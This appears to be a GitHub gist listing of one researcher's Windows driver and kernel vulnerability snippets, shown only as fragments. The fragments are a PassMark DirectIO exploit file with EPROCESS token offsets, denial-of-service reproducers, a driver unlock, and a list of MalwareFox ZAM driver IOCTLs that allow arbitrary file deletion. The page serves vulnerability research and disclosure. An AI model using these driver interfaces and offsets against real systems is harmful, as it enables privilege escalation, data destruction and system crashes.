hfiref0x / directio.c
Created Apr 26, 2021
PassMark DirectIO memory mapping IOCTL's reconst
// Parameter block for the PassMark DirectIO memory-mapping IOCTLs, as
// reconstructed by the gist author (see the gist title).
//
// NOTE(review): the stated size of 45 bytes equals the plain sum of the member
// sizes on a 64-bit build (8+8+8+4+8+8+1) with no alignment padding, so the
// layout is presumably byte-packed (#pragma pack(1) or equivalent). No packing
// directive is visible in this listing - confirm. Under default alignment the
// same declaration is padded to a larger size and the member offsets shift.
//
// Member roles are inferred from the names only - confirm against the driver.
// A driver that accepts this block from user mode has to treat every member,
// including the pointer-typed ones, as untrusted input.
typedef struct _MAP_PARAMS {
HANDLE SectionHandle;          // presumably a handle to the section backing the mapping
PVOID MapBaseAddressIoSpace;   // presumably the I/O-space mapping address
PMDL AllocatedMdl;             // MDL pointer; a kernel-side object by type
DWORD MapSize;                 // presumably the mapping length (units not shown here)
LARGE_INTEGER Offset;          // presumably the offset of the region to map
PVOID MapBaseAddress;          // presumably the resulting mapped base address
BOOLEAN Writeable;             // presumably selects a writable mapping
} MAP_PARAMS, *PMAP_PARAMS; // sizeof == 45 bytes, which holds only for a byte-packed layout
hfiref0x / passmarkdrv.cpp
Created Apr 26, 2021
PassMark DirectIO exploit
#include "global.h"
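// Byte offsets of EPROCESS members, one set per OS release named in the suffix
// (presumably Windows 10 1809 and 1903). EPROCESS is an undocumented structure
// whose layout changes between builds, so each value is meaningful only for
// the release it was taken from.
//
// ActiveProcessLinks is expressed relative to UniqueProcessId: it sits
// sizeof(HANDLE) bytes after it. The expansion is parenthesized so the macro
// stays a single operand inside a larger expression (multiplication, casts,
// pointer arithmetic) instead of being split by operator precedence.
#define EPROCESS_UniqueProcessId_1809 0x2E0
#define EPROCESS_ActiveProcessLinks_1809 (EPROCESS_UniqueProcessId_1809 + sizeof(HANDLE))
#define EPROCESS_Token_1809 0x358
#define EPROCESS_UniqueProcessId_1903 0x02E8
#define EPROCESS_ActiveProcessLinks_1903 (EPROCESS_UniqueProcessId_1903 + sizeof(HANDLE))
#define EPROCESS_Token_1903 0x360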
hfiref0x / NtUserSetWindowsHookEx.cpp
Created Feb 19, 2021
Denial of Service bug in Windows 10 (21313 build) NtUserSetWindowsHookEx
#include <Windows.h>
#include <cstdio>
// Function-pointer type named for NtUserSetWindowsHookEx: NTAPI calling
// convention, NTSTATUS result. All six arguments are declared as opaque
// pointer-sized values (Param1..Param6); their real types and meaning are not
// given in this listing.
typedef NTSTATUS(NTAPI* pfnNtUserSetWindowsHookEx)(
ULONG_PTR Param1,
ULONG_PTR Param2,
ULONG_PTR Param3,
ULONG_PTR Param4,
ULONG_PTR Param5,
ULONG_PTR Param6);
hfiref0x / NtCreateIoRing.cpp
Created Feb 19, 2021
Denial of Service bug in Windows 10 (21313 build) NtCreateIoRing
#include <Windows.h>
#include <cstdio>
// Function-pointer type named for NtCreateIoRing: NTAPI calling convention,
// NTSTATUS result. The four arguments are declared as opaque pointer-sized
// values (Param1..Param4); their real types and meaning are not given in this
// listing.
typedef NTSTATUS(NTAPI* pfnNtCreateIoRing)(
ULONG_PTR Param1,
ULONG_PTR Param2,
ULONG_PTR Param3,
ULONG_PTR Param4
);
View fusion.c
#include <fusion.h>
// Function-pointer type named for the fusion CreateAssemblyEnum API (WINAPI,
// HRESULT result). Per the SAL annotations: pEnum receives the enumerator,
// pUnkReserved and pName are optional inputs, dwFlags is a required input and
// pvReserved is reserved.
// NOTE(review): presumably used to call the export after resolving it at run
// time - the call site is not visible in this listing.
typedef HRESULT(WINAPI* pfnCreateAssemblyEnum)(
_Out_ IAssemblyEnum** pEnum,
_In_opt_ IUnknown* pUnkReserved,
_In_opt_ IAssemblyName* pName,
_In_ DWORD dwFlags,
_Reserved_ LPVOID pvReserved);
typedef HRESULT(WINAPI* pfnCreateAssemblyCache)(
hfiref0x / enetech_new.c
Created Aug 12, 2020
EneTech newest variant (May 2020) unlock, (app+dll)
#include <windows.h>
#include <cstdio>
#include "ntos.h"
// Device type and the map/unmap function numbers for the WinIo-style driver
// interface, each cast to DWORD.
// NOTE(review): presumably combined into control codes (e.g. via CTL_CODE) by
// the IOCTL_WINIO_* definitions; the first of them starts on the next line and
// is cut off in this listing, so the access and method bits are not visible.
#define WINIO_DEVICE_TYPE (DWORD)0x8010
#define WINIO_MAP_FUNCID (DWORD)0x810
#define WINIO_UNMAP_FUNCID (DWORD)0x811
#define IOCTL_WINIO_MAP_USER_PHYSICAL_MEMORY \
View gist:720e2caf58a770117caa1d51d2745491
#pragma warning(disable: 4005)
#include <windows.h>
#include <cstdio>
#include <ntstatus.h>
typedef NTSTATUS (NTAPI *pfnNtCreateEnclave)(
_In_ HANDLE ProcessHandle,
_Inout_ PVOID* BaseAddress,
_In_ ULONG_PTR ZeroBits,
hfiref0x / SecureAPlus.c
Created Feb 28, 2020
SecureAPlus driver DoS
#pragma warning(disable: 4005)
#include <windows.h>
#include <strsafe.h>
#include <ntstatus.h>
#include "ntos.h"
NTSTATUS CallDriver(
_In_ HANDLE DeviceHandle,
_In_ ULONG IoControlCode,
hfiref0x / imf.c
Created Feb 26, 2020
IObit Malware Fighter ImfObCallback.sys features
#pragma warning(disable: 4005)
#include <windows.h>
#include <strsafe.h>
#include <ntstatus.h>
#include "ntos.h"
NTSTATUS CallDriver(
_In_ HANDLE DeviceHandle,
_In_ ULONG IoControlCode,
hfiref0x / zam.md
Created Feb 26, 2020
MalwareFox ZAM backdoor IOCTL list

ZAM64.SYS (ZAMGUARD64.SYS) most interesting IOCTLs.

All parameters to these functions are supplied from user mode via the DeviceIoControl parameters. Everything listed here is available to any local user on a machine where this driver is running.

0x8000202C

Arbitrary file deletion. Resets the file attributes via ZwSetInformationFile and then calls ZwDeleteFile.

0x80002030

Wrapper around ZwQuerySystemInformation(SystemProcessInformation).